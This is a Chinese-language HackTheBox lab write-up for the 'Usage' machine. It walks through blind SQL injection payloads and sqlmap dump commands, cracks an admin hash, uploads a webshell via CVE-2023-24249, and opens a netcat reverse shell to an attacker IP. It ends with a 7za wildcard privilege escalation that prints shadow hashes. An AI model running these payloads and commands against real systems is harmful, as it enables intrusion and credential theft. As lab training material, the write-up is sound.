Usage - HackTheBox

基本信息

• https://app.hackthebox.com/machines/Usage
• 10.10.11.18

端口扫描

22和80：

$ nmap -sC -sV 10.10.11.18
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-15 13:23 CST
Nmap scan report for 10.10.11.18
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
|_  256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.51 seconds

80

需要加hosts：

10.10.11.18 usage.htb

一个博客网站，有注册登录，admin是到admin.usage.htb,同样加hosts：

admin.usage.htb

Admin 登录界面：

usage.htb

注册登录没什么东西，忘记密码那里常规输入单引号报错，基础sql注入：

• What is Blind SQL Injection? Tutorial & Examples | Web Security Academy
  https://portswigger.net/web-security/sql-injection/blind#:~:text=Error%2Dbased%20SQL%20injection%20refers,database%2C%20even%20in%20blind%20contexts.

xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a

sql injection

error盲注，直接sqlmap即可:

sqlmap -r sql.txt -v 3 --level 3 --threads 10
sqlmap -r sql.txt -v 3 --level 3 --threads 10 --dbs
sqlmap -r sql.txt -v 3 --level 3 --threads 10 -D usage_blog --tables
sqlmap -r sql.txt -v 3 --level 3 --threads 10 -D usage_blog -T admin_users --dump

admin
$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2

破解出来密码：

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

whatever1

admin.usage.htb

使用得到的账号密码登录admin：

是 laravel admin，右下角可以得到版本号1.8.17

CVE-2023-24249

根据版本信息搜到相关漏洞：

• CVE-2023-24249 | flyD
  https://flyd.uk/post/cve-2023-24249/

就是头像上传那里上传webshell：

reverse shell

webshell自动清理很快，通过webshell获取reverse shell：

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.4 4444 >/tmp/f

python3 -c 'import pty;pty.spawn("/bin/bash")'

user flag

dash用户目录：

提权信息

dash用户目录有一些monit相关文件，查看这些文件得到一个密码：

3nc0d3d_pa$$w0rd

查看用户目录发现xander用户，测试发现xander用户复用这个密码,xander可以sudo运行/usr/bin/usage_management：

usage_management

测试运行usage_management有三个选项，strings查看也可以看到对应运行的命令：

/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
/usr/bin/mysqldump -A > /var/backups/mysql_backup.sql

7za

根据strings得到的结果，第一个backup选项应该是先进入/var/www/html目录，然后调用7za，并且命令中使用星号：

/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *

• Wildcards Spare tricks | HackTricks | HackTricks
  https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks#id-7z

我们可以向目标压缩包添加任意文件：

提权 & root flag

向压缩包中添加指定文件，然后解压即可：

shadow

root:$y$j9T$eHRVEjBacjX.aL3Dv.ayh/$ya7Anf39wpVrmChSihyT1sxtFg.2JLtN/z5oNXKDRc4:19809:0:99999:7:::
dash:$y$j9T$vnXc5wuMp/3C1Ao0PfIZS1$bR.rwyVqBNeMUHDNze/yT./JKQ.x9D4CsL3EqgMtkG6:19809:0:99999:7:::
xander:$y$j9T$.0U.eu0EIIaUNyu7iFA1x/$ScdmpKaag.GHK3VFzdBCn19UT1eBLRCO7ghAvz7s0u0:19658:0:99999:7:::

参考资料

• What is Blind SQL Injection? Tutorial & Examples | Web Security Academy
  https://portswigger.net/web-security/sql-injection/blind#:~:text=Error%2Dbased%20SQL%20injection%20refers,database%2C%20even%20in%20blind%20contexts.
• CVE-2023-24249 | flyD
  https://flyd.uk/post/cve-2023-24249/
• Wildcards Spare tricks | HackTricks | HackTricks
  https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks#id-7z